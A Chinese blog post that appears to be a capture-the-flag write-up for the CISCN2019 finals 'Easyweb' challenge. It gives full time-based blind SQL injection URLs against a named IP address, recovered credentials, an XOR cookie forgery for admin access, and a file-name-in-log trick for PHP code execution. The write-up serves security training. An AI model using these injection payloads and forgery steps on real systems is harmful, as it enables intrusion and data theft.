[CISCN2019 总决赛 Day2 Web1]Easyweb(预期解)

这道题目是总决赛秦学长出的题(感谢大佬带见世面),写完 wp 很久了,但是因为比赛时 web 都提供了源码,出题时并不知道这个规则,导致解法并不是学长设计题目时的预期解。今天又翻到去年夏天的这篇笔记,就贴出来纪念一下吧(成都火锅真好吃)

 

登录界面如下,发现登录不进去,每点一次login小图片会刷新一次

[CISCN2019 总决赛 Day2 Web1]Easyweb(预期解)_第1张图片

 

查看源代码:

[CISCN2019 总决赛 Day2 Web1]Easyweb(预期解)_第2张图片

图片是通过image.php显示,登录信息会提交到user.php

 

扫描目录:发现robots.txt,看到提示有备份文件

 

 

下载image.php.bak源码:

[CISCN2019 总决赛 Day2 Web1]Easyweb(预期解)_第3张图片

 

构造:

http://94.191.19.91/image.php?id=\0&path=or sleep(3)-- -

解释如下

[CISCN2019 总决赛 Day2 Web1]Easyweb(预期解)_第4张图片

页面延时3秒,通过注入伪造下载地址,可以下载整站源码

http://94.191.19.91/image.php?id=\0&path=union select 1,0x696d6167652e706870-- -

在user.php发现username存在users表中

[CISCN2019 总决赛 Day2 Web1]Easyweb(预期解)_第5张图片

 

获得账号长度4位:

http://94.191.19.91/image.php?id=\0&path=or if((select length(username) from users where id=1)=1,sleep(3),1=2)-- -

http://94.191.19.91/image.php?id=\0&path=or if((select length(username) from users where id=1)=2,sleep(3),1=2)-- -

http://94.191.19.91/image.php?id=\0&path=or if((select length(username) from users where id=1)=3,sleep(3),1=2)-- -

http://94.191.19.91/image.php?id=\0&path=or if((select length(username) from users where id=1)=4,sleep(3),1=2)-- -

(账号长度用大于小于判断可以缩短一些时间)

获得username为hyhs:

http://94.191.19.91/image.php?id=\0&path=or If((select ascii(substr(username,1,1)) from users)=104,sleep(3),1=2)-- -

http://94.191.19.91/image.php?id=\0&path=or If((select ascii(substr(username,2,1)) from users)=121,sleep(3),1=2)-- -

http://94.191.19.91/image.php?id=\0&path=or If((select ascii(substr(username,3,1)) from users)=104,sleep(3),1=2)-- -

http://94.191.19.91/image.php?id=\0&path=or If((select ascii(substr(username,4,1)) from users)=115,sleep(3),1=2)-- -

ascii码二分法尝试,或者用intruder爆破,例如下图爆破第4个字符没有115,那么第4个字符就是115对应的s

[CISCN2019 总决赛 Day2 Web1]Easyweb(预期解)_第6张图片

 

同理获得password为hongyanhuoshui

用得到的username和password登录

 

查看upload.php源码,只要当前用户为admin,即可进行文件上传:

[CISCN2019 总决赛 Day2 Web1]Easyweb(预期解)_第7张图片

 

查看function.php源码:

[CISCN2019 总决赛 Day2 Web1]Easyweb(预期解)_第8张图片

[CISCN2019 总决赛 Day2 Web1]Easyweb(预期解)_第9张图片

username的cookie经过base64解密后再和secret异或得到username,所以已知username为hyhs和cookie再进行一次逐位异或可以得到secret的前4位

 

查看user.php的cookie,base64解密:

[CISCN2019 总决赛 Day2 Web1]Easyweb(预期解)_第10张图片

 [CISCN2019 总决赛 Day2 Web1]Easyweb(预期解)_第11张图片

 

根据加密算法写脚本得到secret前4位:

[CISCN2019 总决赛 Day2 Web1]Easyweb(预期解)_第12张图片

('\x十六进制'就代表这个字符)

admin一共五个字符,已经得到前四位密钥了,一个字母是一个字节,八个比特位,2^8=256,只要爆破至多256次就能得出管理员的cookie

用户名前四位admi和密钥前四位!*(f进行异或运算得到@NE\x0f

 

写一个脚本列出admin与密钥异或所有可能情况:

[CISCN2019 总决赛 Day2 Web1]Easyweb(预期解)_第13张图片

 [CISCN2019 总决赛 Day2 Web1]Easyweb(预期解)_第14张图片

 

抓user.php包,发送到intruder,爆破cookie值:

[CISCN2019 总决赛 Day2 Web1]Easyweb(预期解)_第15张图片

加载脚本生成的字典a.txt,选择base64加密,爆破得到管理员cookie

[CISCN2019 总决赛 Day2 Web1]Easyweb(预期解)_第16张图片

 [CISCN2019 总决赛 Day2 Web1]Easyweb(预期解)_第17张图片

 

修改cookie值为QE5FDx4=,刷新,伪造出admin用户登录:

[CISCN2019 总决赛 Day2 Web1]Easyweb(预期解)_第18张图片

[CISCN2019 总决赛 Day2 Web1]Easyweb(预期解)_第19张图片

 

查看源码,发现提交表单时数据发送到upload.php:

[CISCN2019 总决赛 Day2 Web1]Easyweb(预期解)_第20张图片

读upload.php源码,不能上传php文件,file_put_contents可以把字符串写到文件中去,这个字符串包含了文件名

[CISCN2019 总决赛 Day2 Web1]Easyweb(预期解)_第21张图片

 

上传一个a.txt抓包:

[CISCN2019 总决赛 Day2 Web1]Easyweb(预期解)_第22张图片

 

把a.txt修改为,forward(文件名过滤了php,这种写法一样的):

 

放包,访问logs/upload.log.php:

eval(code) 的功能是将 code 组合成 php 指令,然后将指令执行

   #就相当于执行 phpinfo(); 语句

 

[CISCN2019 总决赛 Day2 Web1]Easyweb(预期解)_第23张图片

file_get_contents()函数将整个文件读入一个字符串

[CISCN2019 总决赛 Day2 Web1]Easyweb(预期解)_第24张图片

 

 

 

 

你可能感兴趣的:([CISCN2019 总决赛 Day2 Web1]Easyweb(预期解))